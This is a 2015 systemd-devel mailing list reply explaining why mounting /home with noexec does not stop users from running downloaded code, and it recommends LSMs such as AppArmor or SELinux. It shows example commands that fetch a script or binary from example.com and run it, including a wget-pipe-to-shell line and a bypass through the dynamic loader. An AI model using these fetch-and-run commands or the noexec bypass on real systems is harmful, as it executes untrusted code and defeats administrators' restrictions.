[systemd-devel] Mount options of /var/run/users/<pid>
Simon McVittie
simon.mcvittie at collabora.co.uk
Mon Feb 16 11:16:12 PST 2015
On 16/02/15 18:14, Павел Самсонов wrote:
> If I have multiuser Linux installation with shell and DE access, my
> users have not places in system, where they able download something from
> internet and execute:
...
> /home rw,noexec
noexec is not sufficient to do what you have said. For instance, your
users could do any of these:
wget http://example.com/malware.sh
/bin/sh malware.sh
wget -O - http://example.com/malware.sh | /bin/sh
wget http://example.com/malware.x86.bin
/lib/ld-linux.so.2 malware.x86.bin
(Or replace /bin/sh with Python, Perl etc., or the x86 executable with
any architecture your machine can run.)
Users who can execute arbitrary code with their own privileges, and
obtain arbitrary files from the Internet, can execute arbitrary code
from the Internet with their own privileges. You are unlikely to be able
to avoid this without LSMs.
If you use an LSM (AppArmor, SELinux, etc.) and "confine" your users,
you might be able to achieve what you think you have already achieved.
--
Simon McVittie
Collabora Ltd. <http://www.collabora.com/>
More information about the systemd-devel
mailing list